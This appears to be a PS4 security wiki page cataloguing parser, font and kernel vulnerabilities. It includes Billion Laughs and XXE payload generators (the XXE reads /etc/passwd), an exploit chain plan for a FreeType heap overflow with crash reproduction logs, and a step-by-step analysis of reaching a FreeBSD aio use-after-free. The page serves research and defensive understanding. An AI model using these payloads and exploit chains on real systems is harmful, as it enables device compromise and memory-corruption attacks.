This is an important rather than a critical vulnerability because of its practical limitations. The flaw arises from unsafe left-shift operations in storeAtts() within libexpat which, under extreme conditions (e.g., over 2^29 prefixed attributes), can lead to undefined behaviour, memory mismanagement and denial of service (DoS). However, exploitation requires a specially crafted XML payload several gigabytes in size (~6.5 GiB), which makes remote exploitation unlikely in real-world environments because of common upload limits and resource constraints. There is no evidence of arbitrary code execution, memory corruption leading to privilege escalation, or data leaks.

Fixed in Expat XML 2.4.3.

CVE-2021-45960

In libexpat before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory). In practice, when processing a very large number of prefixed XML attributes on a single tag, libexpat can terminate unexpectedly because of this integer overflow; the main threat is to availability.

Fixed in Expat XML 2.4.3.

CVE-2013-0340 / CVE-2013-0341

Credits:

  • Sebastian Pipping (hartwork)
  • CVE-2013-0340 - expat internal entity expansion
  • CVE-2013-0341 - expat external entities expansion

Expat XML 2.4.0 fixes long known security issue CVE-2013-0340 by adding protection against so-called Billion Laughs Attacks, a form of denial of service against applications accepting XML input, in all known variations, including recent flavor Parameter Laughs.

Fixed in Expat XML 2.4.0.

XML Billion laughs attack

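The XmlTextReader note under Unity and the libxml2 (CVE-2013-0338 / CVE-2013-0339) and Expat (CVE-2013-0340 / CVE-2013-0341) entries above describe the same two parser behaviours: expanding entities declared in the DTD until memory runs out (Billion Laughs) and resolving entities that point at files or URLs (XXE). The following added example is mine and is not code from libxml2, Expat or the wiki. It builds the classic Billion Laughs document and an XXE document, computes how much data the former would expand to, and shows a parser configured so that both are refused at the entity declaration, before any expansion or fetch can happen. Python's bundled Expat binding (xml.parsers.expat) is used only as a convenient front end to Expat itself; the handler names are the real pyexpat ones, while UnsafeXML, classify() and the sample documents are constructed for this example.

```python
"""Billion Laughs / XXE documents and an Expat setup that refuses them (added example, not project code)."""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised as soon as the document declares an entity: that declaration is the precondition
    for both the expansion blow-up (Billion Laughs) and external-entity resolution (XXE)."""


def billion_laughs(depth: int = 10, fanout: int = 10) -> bytes:
    """Constructed CVE-2013-0338/0340-style document: level i references level i-1 `fanout` times."""
    decls = ['<!ENTITY lol0 "lol">']
    for level in range(1, depth):
        refs = "".join(f"&lol{level - 1};" for _ in range(fanout))
        decls.append(f'<!ENTITY lol{level} "{refs}">')
    doc = ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
           + f'\n]>\n<lolz>&lol{depth - 1};</lolz>\n')
    return doc.encode()


def expanded_size(depth: int = 10, fanout: int = 10) -> int:
    """Bytes a naive parser materialises for billion_laughs(depth, fanout): 3 * fanout**(depth-1)."""
    return len("lol") * fanout ** (depth - 1)


# Constructed CVE-2013-0339/0341-style XXE document; the file path is only an illustrative target.
XXE_DOC = (b'<?xml version="1.0"?>\n'
           b'<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
           b'<d>&xxe;</d>\n')


def hardened_parser():
    """Expat parser that refuses every entity declaration and never loads external DTD content."""
    p = expat.ParserCreate()
    # Never fetch or parse external parameter entities (an external DTD subset is itself a fetch).
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_entity(name, is_parameter_entity, value, base, system_id, public_id, notation_name):
        kind = "external" if system_id is not None else "internal"
        raise UnsafeXML(f"refusing {kind} entity declaration {name!r}")

    p.EntityDeclHandler = reject_entity
    # Belt and braces: returning 0 makes Expat abort on any external entity reference that slipped through.
    p.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 0
    return p


def parse_tags(doc: bytes) -> list:
    """Parse `doc` with the hardened parser and return element names in document order."""
    p = hardened_parser()
    tags = []
    p.StartElementHandler = lambda name, attrs: tags.append(name)
    p.Parse(doc, True)
    return tags


def classify(doc: bytes) -> str:
    """'ok', 'refused' (an entity was declared) or 'malformed' (Expat syntax error)."""
    try:
        parse_tags(doc)
    except UnsafeXML:
        return "refused"
    except expat.ExpatError:
        return "malformed"
    return "ok"
```

The same two controls exist in the other parsers named on this page: with libxml2 leave XML_PARSE_NOENT and XML_PARSE_DTDLOAD unset and add XML_PARSE_NONET, and in .NET use DtdProcessing.Prohibit with a null XmlResolver. Refusing entity declarations outright is stricter than an amplification limit, but for a catalogue or configuration file that never legitimately uses entities it is the simplest rule that is correct.
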
JSON: cJSON

CVE-2022-24384 - Heap overflow in Lua implementation of cJSON

It is probably not applicable to many systems, since it requires either Lua code execution, which is often a jackpot anyway given the many Lua exploits, or control of the input of a program that parses JSON using a component written in Lua.

CVE-2016-10749 - Buffer overflow in parse_string() when last input character is a backslash

  • Credits: Marco Grassi (marcograss) for discovery and disclosure, Max Bruckner (FSMaxB) for the fix

There is a buffer out-of-bounds read in cJSON's parse_string(): a string whose last input character is a backslash makes the escape handling read past the end of the buffer.

Fixed in cJSON 1.7.5. May affect PS4 until System Software version around 4.01.

CVE-2016-4303 - parse_string() mishandles UTF8/16 strings

Fixed in cJSON 1.7.5. May affect PS4 until System Software version around 4.01.

JSON: JSON for Modern C++

JSON: Newtonsoft.Json

JSON: System.Json

  • Used in PS4 [43]
  • Probably Sony's own implementation of JSON, named SceLibJson.
  • It could be inspired by existing JSON parsers like json-c, JSON.NET, JSON C++, jsonxx, Boost.JSON, etc.

CLAPACK

CVE-2021-4048

Font: FreeType 2

FreeType 2 is included in the PS4 OS [47] as a system library in the following modules:

  • /system/common/lib/libSceFreeTypeOt.sprx (library name: libSceFreetype), SCE_SYSMODULE_FREETYPE_OT = 0x99, Font driver for the Font library (OpenType only)
  • /system/common/lib/libSceFreeTypeOl.sprx, SCE_SYSMODULE_FREETYPE_OL = 0x9A, Font driver for the Font library (overall outline fonts including OpenType)
  • /system/common/lib/libSceFreeTypeOptOl.sprx, SCE_SYSMODULE_FREETYPE_OPT_OL = 0x9B, Font driver for the Font library (outline fonts other than OpenType)

It may be needed to load other font related libraries like:

  • /system/common/lib/libSceFont.sprx, SCE_SYSMODULE_FONT = 0x0084, Font library
  • /system/common/lib/libSceFontFt.sprx, SCE_SYSMODULE_FONT_FT = 0x0098, Font interface for the Font library
  • /system/common/lib/libSceWkFontConfig.sprx, SCE_SYSMODULE_RESERVED26 = 0x00E9

To use these libraries you must load the corresponding module before calling any FreeType function, e.g.:

sceSysmoduleLoadModule(SCE_SYSMODULE_FREETYPE_OL);

Thanks to libSceFreetype you can load .ttf and .ttc files.

FreeType 2 is loaded by the Internet Browser to display fonts, notably by loading .ttf files in HTML pages.

FreeType <= 2.13.0 - OOB write (CVE-2025-27363)

Analysis

Bug description

An out-of-bounds write exists in FreeType versions 2.13.0 and below (newer versions of FreeType are not vulnerable) when parsing font subglyph structures related to TrueType GX and variable font files. The vulnerable code assigns a signed short value to an unsigned long and then adds a static value, causing it to wrap around and allocate too small a heap buffer. The code then writes up to 6 signed long integers out of bounds relative to this buffer. This may result in arbitrary code execution.

Web pages now embed fonts, and the affected "variable font files" format is widely used in browsers. It allows parametric adjustment of font properties, described here:

https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_fonts/Variable_fonts_guide

To exploit CVE-2025-27363 on PS4 or PS5, usermode ASLR must be defeated: the attacker must leak the addresses of the loaded modules and find a way to plant a ROP chain in memory. The ASLR break must happen before loading the malformed font, since CVE-2025-27363 does not (apparently) give any information leak by itself. The ROP chain may be placed inside the malformed font file if the file stays contiguous in memory and its address can be leaked. A WebKit exploit providing arbitrary read may therefore be required to use CVE-2025-27363. An exploit strategy proposed by CelesteBlue:

  1. Launch a WebKit exploit to leak some heap and/or modules addresses.
  2. The JS code uses AJAX to send leaked information to the HTTP server.
  3. The HTTP server creates a malformed .ttf font file that will trigger CVE-2025-27363 and contains a PS4 usermode ROP chain.
  4. The JS loads the malformed .ttf font file, triggering the heap buffer overflow.
  5. The heap buffer overflow overwrites a pointer in the heap, now directing to the ROP chain.
  6. The ROP chain runs, fixes the heap and registers then passes to kernel exploitation.

git clone --branch VER-2-13-0 https://gitlab.freedesktop.org/freetype/freetype-demos.git
cd freetype-demos
# In subprojects/freetype2.wrap, set the revision corresponding to 2.13.0:
# revision = de8b92dd7ec634e9e2b25ef534c54a3537555c11 or VER-2-13-0
mkdir build
meson setup build
# In subprojects/freetype2/meson.build, in the "freetype_dep = declare_dependency(" instruction, add
# dependencies: [meson.get_compiler('c').find_library('asan')],
# In subprojects/freetype2/meson.build, set ft2_defines = ['-fsanitize=address']
meson compile -C build
# Ensure that the compiled version is good (2.13.0).
build/ftmulti -v
# Expected result: ftmulti (FreeType) 2.13
cd build
# Expected result without ASAN:
./ftmulti -- rf2.ttf
Segmentation fault (core dumped)
# Expected result with ASAN:
=================================================================
==81377==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000003ae0 at pc 0x64839fc1d94b bp 0x7ffd851da870 sp 0x7ffd851da860
WRITE of size 16 at 0x602000003ae0 thread T0
    #0 0x64839fc1d94a in load_truetype_glyph ../subprojects/freetype2/src/truetype/ttgload.c:1929
    #1 0x64839fc23580 in TT_Load_Glyph ../subprojects/freetype2/src/truetype/ttgload.c:2933
    #2 0x64839fc12881 in tt_glyph_load ../subprojects/freetype2/src/truetype/ttdriver.c:484
    #3 0x64839fbec36b in FT_Load_Glyph ../subprojects/freetype2/src/base/ftobjs.c:1065
    #4 0x64839fbcbc64 in LoadChar ../src/ftmulti.c:382
    #5 0x64839fbcbcc5 in Render_All ../src/ftmulti.c:410
    #6 0x64839fbcd380 in main ../src/ftmulti.c:1168
    #7 0x7f9be9229d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #8 0x7f9be9229e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #9 0x64839fbcb4f4 in _start (/home/me/freetype-demos/build/ftmulti+0x2b4f4)

0x602000003ae0 is located 0 bytes to the right of 16-byte region [0x602000003ad0,0x602000003ae0)
allocated by thread T0 here:
    #0 0x7f9bea4b4887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x64839fe180ff in ft_alloc ../subprojects/freetype2/builds/unix/ftsystem.c:113
    #2 0x64839fc0fce3 in ft_mem_qrealloc ../subprojects/freetype2/src/base/ftutil.c:145
    #3 0x64839fc0fa89 in ft_mem_realloc ../subprojects/freetype2/src/base/ftutil.c:101
    #4 0x64839fc1d48a in load_truetype_glyph ../subprojects/freetype2/src/truetype/ttgload.c:1909
    #5 0x64839fc23580 in TT_Load_Glyph ../subprojects/freetype2/src/truetype/ttgload.c:2933
    #6 0x64839fc12881 in tt_glyph_load ../subprojects/freetype2/src/truetype/ttdriver.c:484
    #7 0x64839fbec36b in FT_Load_Glyph ../subprojects/freetype2/src/base/ftobjs.c:1065
    #8 0x64839fbcbc64 in LoadChar ../src/ftmulti.c:382
    #9 0x64839fbcbcc5 in Render_All ../src/ftmulti.c:410
    #10 0x64839fbcd380 in main ../src/ftmulti.c:1168
    #11 0x7f9be9229d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

SUMMARY: AddressSanitizer: heap-buffer-overflow ../subprojects/freetype2/src/truetype/ttgload.c:1929 in load_truetype_glyph
Shadow bytes around the buggy address:
  0x0c047fff8700: fa fa fa fa fa fa 00 00 fa fa 00 fa fa fa 05 fa
  0x0c047fff8710: fa fa 05 fa fa fa fa fa fa fa fa fa fa fa 07 fa
  0x0c047fff8720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8730: fa fa fa fa fa fa fa fa fa fa 04 fa fa fa 04 fa
  0x0c047fff8740: fa fa 00 fa fa fa fa fa fa fa 00 fa fa fa 00 00
=>0x0c047fff8750: fa fa 02 fa fa fa 01 fa fa fa 00 00[fa]fa fa fa
  0x0c047fff8760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff87a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==81377==ABORTING
# Test with lldb:
lldb ./ftmulti -- rf2.ttf
# Expected result:
(lldb) target create "ftmulti"
Current executable set to '/home/me/freetype-demos/build/ftmulti' (x86_64).
(lldb) settings set -- target.run-args  "rf2.ttf"
(lldb) run
Process 52725 launched: '/home/me/freetype-demos/build/ftmulti' (x86_64)
Process 52725 stopped
* thread #1, name = 'ftmulti', stop reason = signal SIGSEGV: invalid address (fault address: 0x555d556ee1f8)
    frame #0: 0x000055555559767d ftmulti`TT_Vary_Apply_Glyph_Deltas(loader=0x00007fffffffd8d0, outline=0x00007fffffffd740, unrounded=0x00005555556ee170) at ttgxvar.c:4339:36
   4336	    /* support, respectively.                                 */
   4337	    if ( face->variation_support & TT_FACE_FLAG_VAR_HADVANCE )
   4338	    {
-> 4339	      point_deltas_x[n_points - 4] = 0;
   4340	      point_deltas_y[n_points - 4] = 0;
   4341	      point_deltas_x[n_points - 3] = 0;
   4342	      point_deltas_y[n_points - 3] = 0;

Implementation[edit | edit source]

Patched[edit | edit source]

Probably patched in PS4 System Software 12.52. The crash reproduces in the PS4 12.00 web browser.

FreeType <= 2.12.1 - Integer overflow in tt_hvadvance_adjust() in src/truetype/ttgxvar.c (CVE-2023-2004)[edit | edit source]

Affects up to 2.12.1 at least.

Bug description[edit | edit source]

An integer overflow was found in FreeType's tt_hvadvance_adjust() function in src/truetype/ttgxvar.c.

It was discovered that FreeType incorrectly handled certain malformed font files. If a user were tricked into using a specially crafted font file, a remote attacker could cause FreeType to crash, or possibly execute arbitrary code.

FreeType <= 2.10.3 - Heap buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)[edit | edit source]

A heap buffer overflow has been found in FreeType before 2.10.4. Malformed TTF files with PNG sbit glyphs can cause a heap buffer overflow in Load_SBit_Png: libpng keeps the original 32-bit width and height in png_struct, while FreeType truncates them to 16-bit glyph metrics and sizes the bitmap from the truncated values. If the original width and/or height is greater than 65535, the allocated buffer cannot hold the bitmap that libpng writes into it.
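As an added example (not FreeType's code), the following C model reproduces the truncation in miniature: the 32-bit PNG dimensions are narrowed to 16-bit metrics fields and the buffer size is derived from the narrowed copies, so a width of 0x10001 yields a 4-byte buffer while libpng writes 0x40004 bytes for the first row alone. The struct and function names are invented stand-ins, and the "too large" check placement is a simplification; the real Load_SBit_Png code differs in detail.

```c
/* Added example (not FreeType's code): a reduced model of the CVE-2020-15999
 * size mismatch in Load_SBit_Png. libpng keeps the IHDR width/height as 32-bit
 * values; the loader copied them into 16-bit glyph metrics and sized the bitmap
 * from the truncated copies. Names below are simplified stand-ins. */
#include <stdint.h>
#include <stddef.h>

struct sbit_metrics { uint16_t width, height; };   /* FT_UShort-sized fields */

/* Bytes libpng actually produces for one BGRA row (uses the 32-bit width). */
size_t png_row_bytes(uint32_t img_width) {
    return (size_t)img_width * 4u;
}

/* Vulnerable pattern (model): narrow first, then size and range-check the
 * buffer from the narrowed values. Returns the bitmap allocation size, 0 if
 * the (ineffective) size check rejects the image. */
size_t sbit_alloc_size_vulnerable(uint32_t img_width, uint32_t img_height,
                                  struct sbit_metrics *m) {
    m->width  = (uint16_t)img_width;        /* 0x10001 becomes 1 */
    m->height = (uint16_t)img_height;
    if (m->width > 0x7FFF || m->height > 0x7FFF)   /* checks the truncated copy */
        return 0;
    return (size_t)m->width * 4u * (size_t)m->height;
}

/* Hardened pattern: range-check the original 32-bit values before narrowing,
 * so anything that would not round-trip through 16 bits is rejected. */
size_t sbit_alloc_size_hardened(uint32_t img_width, uint32_t img_height,
                                struct sbit_metrics *m) {
    if (img_width > 0x7FFF || img_height > 0x7FFF)
        return 0;                            /* reject before any allocation */
    m->width  = (uint16_t)img_width;
    m->height = (uint16_t)img_height;
    return (size_t)m->width * 4u * (size_t)m->height;
}

/* 1 if libpng's first row alone would overrun the buffer the loader sized. */
int row_overflows_buffer(uint32_t img_width, size_t alloc_size) {
    return alloc_size != 0 && png_row_bytes(img_width) > alloc_size;
}
```

A width of 0x10001 with height 1 passes the vulnerable variant with a 4-byte allocation, which the first 0x40004-byte row overruns; the hardened variant rejects it outright, and an ordinary 16x16 bitmap is accepted by both.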

FreeType 2 before 2017-02-02 - Heap-buffer-overflow in tt_size_reset (CVE-2017-7864)[edit | edit source]

FreeType 2 before 2017-02-02 has an out-of-bounds write caused by a heap-based buffer overflow related to the tt_size_reset function in truetype/ttobjs.c.

OOB write (CVE-2017-8287)[edit | edit source]

OOB write (CVE-2017-8105)[edit | edit source]

Heap buffer overflow (CVE-2016-10328)[edit | edit source]

Heap buffer overflow (CVE-2016-10244)[edit | edit source]

Savannah bugs 41309 and 41590[edit | edit source]

Many vulnerabilities in 2014[edit | edit source]

CVE-2014-9656, CVE-2014-9657, CVE-2014-9658, CVE-2014-9660, CVE-2014-9661, CVE-2014-9662, CVE-2014-9663, CVE-2014-9664, CVE-2014-9666, CVE-2014-9667, CVE-2014-9669, CVE-2014-9670, CVE-2014-9671, CVE-2014-9672, CVE-2014-9673, CVE-2014-9674, CVE-2014-9675

FreeType <= 2.5.3 - Type42 parsing use-after-free in "FT_Stream_TryRead" (embedded BDF loading) (CVE-2014-9661)[edit | edit source]

Credits[edit | edit source]

  • Discovered by Mateusz Jurczyk (mjurczyk, j00ru).

Analysis[edit | edit source]

Bug description[edit | edit source]

A use-after-free condition has been encountered in FreeType 2.5.3 while fuzzing Type42 fonts. type42/t42parse.c in FreeType before 2.5.4 does not consider that scanning can be incomplete without triggering an error, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted Type42 font.

git clone --branch VER-2-5-3 https://gitlab.freedesktop.org/freetype/freetype.git
cd freetype
./autogen.sh
mkdir build
cd build
cmake ..
make
make install
cd ../..
mv freetype freetype2
git clone --branch VER-2-5-3 https://gitlab.freedesktop.org/freetype/freetype-demos.git
cd freetype-demos
# In Makefile, add -lasan before $(FTLIB) in the linker call
# In Makefile, add -fsanitize=address between $(CC) and $(CPPFLAGS)
make
make
cd bin
./ftbench poc.t42
# Result:
=================================================================
==27108==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000001a9c at pc 0x75b41c63a397 bp 0x7ffd114b3990 sp 0x7ffd114b3138
READ of size 2048 at 0x61f000001a9c thread T0
    #0 0x75b41c63a396 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
    #1 0x75b41d03c712 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
    #2 0x75b41d03c712 in FT_Stream_TryRead /home/me/freetype/src/base/ftstream.c:182

Implementation[edit | edit source]

Patched[edit | edit source]

Probably patched since PS4 System Software 2.03.

FreeType <= 2.5.3 - OOB RW in cf2_hintmap_build() in the CFF rasterizing (CVE-2014-2240)[edit | edit source]

Credits[edit | edit source]

  • Discovered by Mateusz Jurczyk (mjurczyk, j00ru).

Analysis[edit | edit source]

Bug description[edit | edit source]

It was reported that FreeType before 2.5.4 suffers from an out-of-bounds stack-based read/write flaw in cf2_hintmap_build() in the CFF rasterizing code, which could lead to a buffer overflow. The original cf2_hintmap_build() overflow (CVE-2014-2240) was fixed in 2.5.3, but that fix was found to be incomplete, and the follow-up fix shipped in 2.5.4.

j00ru managed to successfully exploit the vulnerability by crafting a special OTF file which, when processed by the ftbench utility compiled as a 32-bit executable with SSP and PIE enabled and NX disabled, built with clang 3.5, spawned a new command shell.

Patched[edit | edit source]

Probably patched since PS4 System Software 2.03.

FreeType <= 2.4.6 - Integer signedness error in psaux/t1decode.c (CVE-2011-0226)[edit | edit source]

Using FreeType on PS4[edit | edit source]

libPS4freetype2 is a simple wrapper around the original upstream freetype2 library, written by Zer0xFF, that simplifies the process of printing text on the screen in homebrew PS4 programs.

Building FreeType on PC[edit | edit source]

With Meson, for versions around 2.13.0:

git clone --branch VER-2-13-0 https://gitlab.freedesktop.org/freetype/freetype.git
cd freetype
./autogen.sh
mkdir build
meson setup build
meson compile -C build
meson install -C build

With Cmake, for versions around 2.5.3:

git clone --branch VER-2-5-3 https://gitlab.freedesktop.org/freetype/freetype.git
cd freetype
./autogen.sh
mkdir build
cd build
cmake ..
make
make install

See also[edit | edit source]

Usage:
make
./ttf2postscriptcid -d rf2.ttf

Font: OpenType and TrueType[edit | edit source]

OpenType and/or TrueType may be used in some components of the PS4 and PS5, like in BD-J.

Memory disclosure in Java via fonts (CVE-2015-2619)[edit | edit source]

When successfully exploited, the security flaw would allow an attacker to leak uninitialized memory from the process heap or kernel pools, potentially leading to the disclosure of sensitive information or facilitating the exploitation of a more serious bug by helping defeat exploit mitigations. Both 32- and 64-bit builds of the affected software were prone to the vulnerability. Similarly to the “blend” issue, due to the cross-platform nature of the bug, it could be used in an exploit chain together with memory corruption bugs to e.g. provide a de-ASLR primitive for a user-mode application (in order to achieve RCE) and then for the kernel itself (to escape the sandbox or otherwise elevate the attacker’s privileges).

As such, the bug would generally allow uninitialized memory to be reflected in the final glyph’s shape as rasterized on the display. Therefore, in order to actually take advantage of it, it is also necessary to have a way of reading the pixels back and recovering the original uninitialized bytes. No PoC for Java was written, considering its marginal attack vectors.

See also[edit | edit source]

libpng[edit | edit source]

libpng is present in the PS4 System Software in the file /system/common/lib/libpng16.sprx stored on the internal HDD and as internal sysmodule 0x800000AB.

There are also libScePngParser (internal sysmodule 0x8000005D), libScePngDec (sysmodule 0x8C) and libScePngEnc (sysmodule 0x8D) libraries on the PS4.

A malicious PNG file can be loaded via many vectors:

  • in the internet browser, by loading a HTML page that imports a PNG image
  • in the Media Gallery application, by loading a malicious screenshot stored at /user/av_contents/photo/NPXS20001/NPXS20001/XXX/
  • in the main menu, by changing PNG files on the internal HDD, notably application icons

Heap buffer overflow in png_image_finish_read (CVE-2025-65018)[edit | edit source]

Triggers error CE-110169-8 on PS5.

libTIFF and zlib[edit | edit source]

FFmpeg[edit | edit source]

The SHAREfactory application on PS4 uses FFmpeg and allows to load many file formats and codecs.

libwebp[edit | edit source]

The PS4 may not support the WebP raster graphics file format.

OOB write in ReadHuffmanCodes() (CVE-2023-4863, CVE-2023-41064)[edit | edit source]

Kernel[edit | edit source]

Untested[edit | edit source]

FW 5.00-?11.52? - Unknown bug in aio_multi_delete()[edit | edit source]

Credits[edit | edit source]

  • 2025-04-01 Anonymous for sharing 12.02 and 12.50 PS4 kernel dumps for diffing.
  • 2025-04-01 D-Link Turtle for publicly disclosing the patched code of a bug in PS4 12.50 kernel.

Analysis[edit | edit source]

Bug Description[edit | edit source]

This bug is harder to exploit than the "Double free due to aio_multi_delete() improper locking" bug, so there is little point in studying this one.

Exploit Implementation[edit | edit source]

No PoC available.

Patched[edit | edit source]

Yes in PS4 ?12.00? FW (unpatched in 10.71) and PS5 ?10.00? FW. Probably not working before PS4 FW 5.00 because sys_aio_multi_delete() syscall was not implemented.


FW 5.00-?9.60? - UaF in aio_aqueue() due to credential reference count leak (CVE-2022-23090)[edit | edit source]

Credits[edit | edit source]

  • 2022-08-09 Chris J-D ([email protected]) for discovering, reporting publicly CVE-2022-23090 to FreeBSD and publishing a writeup.

Analysis[edit | edit source]

Bug Description[edit | edit source]

FreeBSD's aio(4) subsystem implements asynchronous I/O. As exposed in CVE-2022-23090, the aio_aqueue() function, used by the lio_listio() system call (#257 on FreeBSD), fails to release a reference to a credential in an error case. An attacker may cause the reference count to overflow, leading to a use-after-free. The PS4 may not be affected by this vulnerability: the AIO API was barely implemented on PS4 before 5.00, and the affected code was extended in FreeBSD in 2016. Moreover, the vulnerability exists in FreeBSD 12 and 13 but maybe not in FreeBSD 9.1, from which the PS4 kernel takes its source.

Exploit Implementation[edit | edit source]

#define SYS_lio_listio  257
int kern_lio_listio(struct thread *td, int mode, struct aiocb * const *uacb_list,
    struct aiocb **acb_list, int nent, struct sigevent *sig,
    struct aiocb_ops *ops);
  • Ideas (to be compared with Chris J-D's writeup) to make a PoC for FreeBSD 12.3 by CelesteBlue, based on FreeBSD 12.2 vfs_aio.c:

Precisely, the target error "err4" in the aio_aqueue() function, is triggered only in the case

if (opcode != LIO_MLOCK && ((fp->f_ops->fo_aio_queue == NULL && aio_queue_file(fp, job) != 0) || fo_aio_queue(fp, job) != 0))
   goto err4;

So to jump to err4, the opcode variable must not be LIO_MLOCK, but must be valid to pass earlier checks. Moreover, opcode must not be LIO_NOP else the function exits before triggering the bug. According to

	switch (opcode) {
	case LIO_WRITE:
		error = fget_write(td, fd, &cap_pwrite_rights, &fp);
		break;
	case LIO_READ:
		error = fget_read(td, fd, &cap_pread_rights, &fp);
		break;
	case LIO_SYNC:
		error = fget(td, fd, &cap_fsync_rights, &fp);
		break;
	case LIO_MLOCK:
		fp = NULL;
		break;
	case LIO_NOP:
		error = fget(td, fd, &cap_no_rights, &fp);
		break;
	default:
		error = EINVAL;
	}

the remaining possible opcodes are LIO_WRITE, LIO_READ and LIO_SYNC. If you target LIO_WRITE or LIO_READ, the only additional check rejects a negative job->uaiocb.aio_offset unless fp->f_vnode != NULL && fp->f_vnode->v_type == VCHR, so a non-negative offset passes on any file type and a negative offset passes only on a character device. If you target LIO_SYNC, you have to ensure that fp->f_vnode != NULL. Next, you have to make sure that ops->store_kernelinfo(ujob, jid) does not return an error. Then, there are two paths that do not make much difference except a few more values checked.

  • Path A1: job->uaiocb.aio_sigevent.sigev_notify != SIGEV_KEVENT. Then the code jumps to the no_kqueue label.
  • Path A2: job->uaiocb.aio_sigevent.sigev_notify == SIGEV_KEVENT. Then, a few more checks have to pass than in path A1. First, you need (job->uaiocb.aio_sigevent.sigev_notify_kevent_flags & ~(EV_CLEAR | EV_DISPATCH | EV_ONESHOT)) == 0. Secondly, kqfd_register(kqfd, &kev, td, M_WAITOK) must not return an error. Finally the code arrives at the no_kqueue label.

At the no_kqueue label, there are again two paths to trigger the bug:

  • Path B1: fp->f_ops->fo_aio_queue == NULL. Then, you have to make aio_queue_file(fp, job) return an error. There are multiple ways.
    • Path B1.1: Make aio_qbio(job->userproc, job) return an error. There are tons of ways to do so.
    • Path B1.2: Ensure that fp->f_type != DTYPE_VNODE || (fp->f_vnode->v_type != VREG && fp->f_vnode->v_type != VDIR) || (fp->f_vnode->v_mount != NULL && (fp->f_vnode->v_mount->mnt_flag & MNT_LOCAL) == 0). No vnode crafting is needed: a pipe descriptor already satisfies fp->f_type != DTYPE_VNODE, and a character device such as /dev/null is a vnode whose v_type is VCHR, neither VREG nor VDIR. With the default vfs.aio.enable_unsafe=0, aio_queue_file() refuses such "unsafe" descriptors with EOPNOTSUPP, which is the error return that reaches err4.
    • Path B1.3 (impossible): Force job->uaiocb.aio_lio_opcode not to be LIO_WRITE, LIO_READ nor LIO_SYNC. This is impossible in our case because earlier we proved that we needed the opcode variable to be LIO_WRITE, LIO_READ or LIO_SYNC to enter this path.
  • Path B2 (impossible before 2016, so probably impossible on PS4 and FreeBSD 9): fp->f_ops->fo_aio_queue != NULL. Then, you have to make fo_aio_queue(fp, job) return an error. int fo_aio_queue_t(struct file *fp, struct kaiocb *job); is a file operation, which is responsible for queueing and completing an asynchronous I/O request for a given file. See fo_aio_queue introductory commit. It must be specified in the fileops structure.
struct fileops {
	fo_rdwr_t	*fo_read;
	fo_rdwr_t	*fo_write;
	fo_truncate_t	*fo_truncate;
	fo_ioctl_t	*fo_ioctl;
	fo_poll_t	*fo_poll;
	fo_kqfilter_t	*fo_kqfilter;
	fo_stat_t	*fo_stat;
	fo_close_t	*fo_close;
	fo_chmod_t	*fo_chmod;
	fo_chown_t	*fo_chown;
	fo_sendfile_t	*fo_sendfile;
	fo_seek_t	*fo_seek;
	fo_fill_kinfo_t	*fo_fill_kinfo;
	fo_mmap_t	*fo_mmap;
	fo_aio_queue_t	*fo_aio_queue;
	fo_flags_t	fo_flags;	/* DFLAG_* below */
};

Now, looking back to the syscall lio_listio() that calls aio_aqueue(), it does aio_aqueue(td, job, lj, LIO_NOP, ops); so the parameter type is forced to be LIO_NOP. However, in aio_aqueue(), when type == LIO_NOP, the opcode is retrieved from job->uaiocb.aio_lio_opcode, which is itself earlier copied using ops->copyin(ujob, &job->uaiocb);, where ujob is in fact a job element of aiocb_list. The aiocb_list argument is an array of pointers to aiocb structures that describe I/O operations. These operations are executed in an unspecified order. The n argument specifies the size of the array aiocb_list. Null pointers in aiocb_list are ignored. In each control block in aiocb_list, the aio_lio_opcode field specifies the I/O operation to be initiated, as follows:

  • LIO_READ: Initiate a read operation. The operation is queued as for a call to aio_read(3) specifying this control block.
  • LIO_WRITE: Initiate a write operation. The operation is queued as for a call to aio_write(3) specifying this control block.
  • LIO_NOP: Ignore this control block.

In conclusion, by fuzzing calls to the lio_listio() syscall with sufficiently valid arguments and a big aiocb_list that contains jobs such that aiocb_list[i]->aio_lio_opcode is LIO_READ or LIO_WRITE, an error may be triggered such as:

  • EAGAIN Out of resources.
  • EAGAIN The number of I/O operations specified by n would cause the limit AIO_MAX to be exceeded.
  • EINTR mode was LIO_WAIT and a signal was caught before all I/O operations completed; see signal(7). (This may even be one of the signals used for asynchronous I/O completion notification.)
